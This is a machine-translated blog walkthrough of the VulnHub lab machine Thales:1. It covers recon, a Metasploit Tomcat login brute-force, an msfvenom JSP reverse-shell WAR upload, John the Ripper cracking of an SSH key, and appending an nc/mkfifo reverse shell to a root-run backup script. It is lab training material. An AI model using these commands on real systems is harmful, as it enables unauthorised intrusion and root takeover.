当前位置:网站首页>[vulnhub range] thales:1
[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Catalog
3、 ... and 、 Elevated privileges
0x02 Dictionary explosion edit
Preface
describe
brief introduction : Open your eyes , Another angle
Include 2 A sign :user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Introduction to the environment kali 192.168.56.102 Thales Drone aircraft 192.168.56.101
One 、 information gathering
0x00 arp-scan scanning
arp-scan -I eth1 -l # Scan network card LAN
0x01 nmap scanning
Scan to two network segments Not sure which nmap Scan scan two IP
Open ports 22 and 8080
Visit Site , User name and password are required
Two 、 Exploit
0x00 msfconsole utilize
msf Search for tomcat login
To configure payload
user name tomcat password role1
Login successfully
0x01 Upload files
Look for function points , Found the upload point
utilize kali Generate war File Trojan do rebound shell msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
Upload successful , And run
3、 ... and 、 Elevated privileges
0x00 rebound shell
Listening port
Upgrade transaction mutual shell
sudo -l # Need a password , Unknown stay home User found under file Thales
stay `notes.txt` Found in the file `/usr/local/bin/backup.sh View file contents
0x02 Dictionary explosion
Find out .ssh Folder
It is found that the private key can be used ssh2john.py Generate password file explosion
use ssh2john.py Compile the script
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Burst out the code vodka06
Switching users
0x03 user.txt
see user.txt--- first flag
notes.txt yes root The powers of the , There may be something inside
0x04 rebound shell
notice backup.sh It has executive authority , Can write bounce shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
File content editing will directly replace , Append for selection
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
monitor 9999, After writing, you will connect by yourself
summary
Thales Learned
msf The use of blasting dictionary
rsa Use of private key ciphertext
边栏推荐
- 10 schemes to ensure interface data security
- Migration and reprint
- laravel怎么获取到public路径
- Excessive dependence on subsidies, difficult collection of key customers, and how strong is the potential to reach the dream of "the first share of domestic databases"?
- asyncio 概念和用法
- SysOM 案例解析:消失的内存都去哪了 !| 龙蜥技术
- Unity3d click events added to 3D objects in the scene
- Notification uses full resolution
- The unity vector rotates at a point
- Apache Doris just "graduated": why should we pay attention to this kind of SQL data warehouse?
猜你喜欢
融云斩获 2022 中国信创数字化办公门户卓越产品奖!
Vs tool word highlight with margin
Leetcode-231-2的幂
pycharm 终端部启用虚拟环境
预测——灰色预测
Eye of depth (VI) -- inverse of matrix (attachment: some ideas of logistic model)
Dotween -- ease function
神经网络c语言中的指针是怎么回事
95.(cesium篇)cesium动态单体化-3D建筑物(楼栋)
Unity3D_ Class fishing project, control the distance between collision walls to adapt to different models
随机推荐
【Android -- 数据存储】使用 SQLite 存储数据
Communication mode between application program and MATLAB
What is the difference between IP address and physical address
laravel构造函数和中间件执行顺序问题
统计学习方法——感知机
Performance comparison of tidb for PostgreSQL and yugabytedb on sysbench
Odoo integrated plausible embedded code monitoring platform
Eye of depth (VI) -- inverse of matrix (attachment: some ideas of logistic model)
prometheus api删除某个指定job的所有数据
【花雕体验】15 尝试搭建Beetle ESP32 C3之Arduino开发环境
The differences between exit, exit (0), exit (1), exit ('0 '), exit ('1'), die and return in PHP
SPI master rx time out中断
Unity的三种单例模式(饿汉,懒汉,MonoBehaviour)
安科瑞电网智能化发展的必然趋势电力系统采用微机保护装置是
Performance measure of classification model
AE learning 01: AE complete project summary
Description of vs common shortcut keys
Asyncio concept and usage
Multiplication in pytorch: mul (), multiply (), matmul (), mm (), MV (), dot ()
Vs tool word highlight with margin